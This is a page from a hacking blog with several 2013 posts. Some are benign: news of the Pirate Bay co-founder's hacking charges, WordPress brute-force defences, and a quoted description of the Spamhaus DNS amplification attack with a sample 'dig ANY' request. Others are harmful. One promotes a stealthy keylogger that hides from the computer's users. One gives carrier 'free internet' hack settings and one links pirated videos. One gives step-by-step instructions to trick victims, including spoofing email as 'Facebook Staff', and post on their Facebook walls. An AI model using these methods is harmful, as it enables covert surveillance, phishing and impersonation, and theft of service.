    How do I find if out my bug was eligible?

    You will see a provisional comment to that effect in the bug entry once we have triaged the bug etc.

    What if someone else also found the same bug?

    Only the first report of a given issue that we were previously unaware of is eligible. In the event of a duplicate submission, the earliest filed bug report in the bug tracker is considered the first report.

    For more information, please Visit Here.

    Also Read- How Hackers can Make Money with PayPal Bug Bounty Programs?

    24 April 2013

    Pirate Bay Co-founder Charged for Hacking Machines & Stealing Money

    The Pirate Bay co-founder charged with hacking and stealing money Recently Pirate Bay co-founder Gottfrid Svartholm Warg was charged with hacking the IBM mainframe of Logica, a Swedish IT firm that provided tax services to Swedish government, and IBM mainframe of the Swedish Nordea bank, the Swedish public prosecutor. Also Besides Svartholm Warg, the prosecution charged three other Swedish citizens as well.

    According to the prosecutors, IBM mainframes belonging to Logica and the bank were targeted in the attacks, which are said to have begun in 2010, and continued until April 2012. The Swedish authorities have claimed that it is the biggest investigation into a data intrusion ever conducted in the country.

    Prosecutor Henrik Olin Says that,

    "A large amount of data from companies and agencies was taken during this hack including a large amount of personal data, such as personal identity numbers of people with protected identities... I'd say that Svartholm Warg is the main person and brains behind the hacker attack."

    In total, the four men allegedly attempted to transfer a little over 680,000 Euros to different bank accounts. Therefore Court proceedings against Svartholm Warg and the other three are expected to begin at the Nacka district court at the end of May, Olin said.

    That’s it!

    17 April 2013

    WordPress Blogs Under Botnet Attack and Prevention

    botnet attack All the world knows that WordPress is one of the best blogging platform ever, now due to it its Hacking is becoming common now a days. In a recent post, Matt Mullenweg posted about the recent attack on WordPress sites. This is a botnet attack, and is performing brute force attack using default WordPress login (admin). A large botnet with more than 90k servers is attempting to log in by cycling through several passwords and usernames. So lets learn more on it below-

    What is Botnet Attack?

  • Bot master: Usually the hacker who operates all infected computer.
  • Zombies computer/Bot: System which are infected by the Bot master, and helps in spamming. Usually owner of computers are unaware of the fact, that they are compromised. It could be anyone computer, including yours etc.

    How to Prevent WordPress from brute force attack?

    1. Install Limit login attempt plugin, hence it blocks individual I.P., in this botnet attack, hackers are running the attack using 90,000+ I.P.

  • 2. Use .htaccess to protect your admin pages and rename the login pages.

    3. Change your WordPress default username also

    4. Enable two-step authentication and

    5. Always use a complex password etc.

    That’s it! Also don’t forgot to make a backup of your blog for some extra security. Peace!

    10 April 2013

    Download free Phrozen Keylogger to capture all Keystrokes

    keylogger 2013 Are you fed up with all paid keyloggers? if yes, then today I will provide you a absolutely free software named as Phrozen Keylogger which is 100% free and full version. It is actually developed by Dark comet RAT developer. Now Phrozen Keylogger Lite is also compatible with Windows 8. Phrozen Keylogger Lite has been especially created to capture all keystrokes from any type of keyboard (PS/2, USB and even Virtual Keyboards). The captured keystrokes are stored into a local database. There they are sorted by their process name and the active window into a log.

    How it works?

    This software is silently activated in background. When the program is successfully installed on a computer, it will capture all keystrokes fully stealthily & the program will remain hidden from every user. It will not slow down the computer it is installed on etc.

    Now if you want to consult the logs of the current/previous days just hit the so-called “Magic Shortcut” and enter your personal password and the logs will be made visible in a new window. With this, You can easily manage, export, delete, mark as important, mail, etc. these logs.

    Download Phrozen Keylogger Lite v1.0

    04 April 2013

    World's biggest DDoS Attack Ever in the World

    DDoS attack Do you know my friends that last week it has been seen probably the largest distributed denial-of-service (DDoS) attack ever on Internet. Around 300Gbps was thrown against Internet blacklist maintainer Spamhaus' website but the anti-spam organisation , CloudFlare was able to recover from this attack and get its core services back up and running etc.

    The Spamhaus Project is an international organization based in both London and Geneva, founded in 1998 by Steve Linford to track email spammers and spam-related activity. The name spamhaus, a pseudo-German expression was coined by Linford for an Internet service provider, or other firm, which spams or knowingly provides service to spammers.

    “In the Spamhaus case, the attacker was sending requests for the DNS zone file for to open DNS resolvers. The attacker spoofed the CloudFlare IPs we'd issued for Spamhaus as the source in their DNS requests. The open resolvers responded with DNS zone file, generating collectively approximately 75Gbps of attack traffic. The requests were likely approximately 36 bytes long (e.g. dig ANY @X.X.X.X +edns=0 +bufsize=4096, where X.X.X.X is replaced with the IP address of an open DNS resolver) and the response was approximately 3,000 bytes, translating to a 100x amplification factor."

    Read also- How to Flood a Website with Denial of Service Attack

    Thats it!

    29 March 2013

    Best Vodafone and Airtel 3G + 2G Hack 2013

    vodafone hack 2013 Hope that you all are satisfied with my older posts. Now I am back again with a very interesting hacking tricks. This article is very good for Airtel and Vodafone users because in this article you can learn free 3G/2G hack of Airtel and Vodafone. By using these hack tricks you can enjoy your internet both in 2G and 3G speed. You can also download any thing in just few minutes. These tricks are also used by me and my friends but I am not sure that these hacking tricks will work in your region also but you are a very lucky person if these tricks works well in your region. Hope you all will like this article too.

    Hack Trick for Vodafone:

    Access point - internet
    Proxy -
    Proxy type - Real Host
    Homepage -
    By applying these settings you can enjoy the internet in lightning fast speed.Enjoy...

    Hack Trick for Airtel:

    APN -
    Proxy -
    Port - 80
    Homepage - or if have your own other selected free homepage

    That's all...

    About the Author:

    This is Sumit Dadwal from

    26 March 2013

    Download Ankit Fadia Ethical Hacking Video Tutorial Pack- Certified Ethical Hacker 6.0

    ankit fadia hacking pack Well today I am going to present free Ankit Fadia Ethical Hacking - Video Tutorial Pack: Certified Ethical Hacker 6.0 Download Free. In this, you will get Ethical Hacking & Penetration | VTC, Intro To Computer Forensics | VTC and Linux Hacking videos. The size is approximately 2.7 GB and totally awesome. So please must download and watch it to become the best out of hackers world etc.

    Download Links:



    That’s it! Enjoy…

    19 March 2013

    Facebook Wall Posting Hack and Upload Images On Other Accounts

    facebook wall posting hack Now a days Facebook Wall Posting hack is becoming common at all and here you can upload images as well on any Facebook account using my secret technique. Actually Facebook allows users to post any message on his/her wall using email service without login in into Facebook account. Now here in this wall hacking method you use that same email id of your victim to post your message or any image on his/her Facebook account. That’s it!

    How to Post A Status And Upload Images On Any Other Facebook Account Without Permission: Hack

    1. First of all visit and here you will see a unique email under "post it by email" That is your unique email. What we are trying to do is getting your victims unique email by social engineering them, I will post an example below in step number 2.

    2. Get in contact with your slave. Send him a message saying something like "Hey Can you tell me the email on this page :, I need it so I can upload something via my email." You can create your own method for this. Another method would be using this email spoofer "" and sending them a message filling out the name. For example, From name: Facebook Staff, From email:, etc asking them for the email at

    hack facebook password

    3. Now once you have SE'd your victims unique email, go to your hotmail/gmail account and send an email to the unique email he gave you. In the subject box is the status you want to come up on his wall, eg; "text here" the main box is for the picture attachment you want to attach, I don't think you can upload more than 1 image per status, you'll have to try it out :). Once you send it, it will appear on his wall, simple as that.

    hack facebook password

    All Done! Enjoy…


    Recent Posts

    Review this blog on

    Recent Comments

    | KrackoWorld (KoW) © 2014. All Rights Reserved | Style By All Web Designing | | Contact |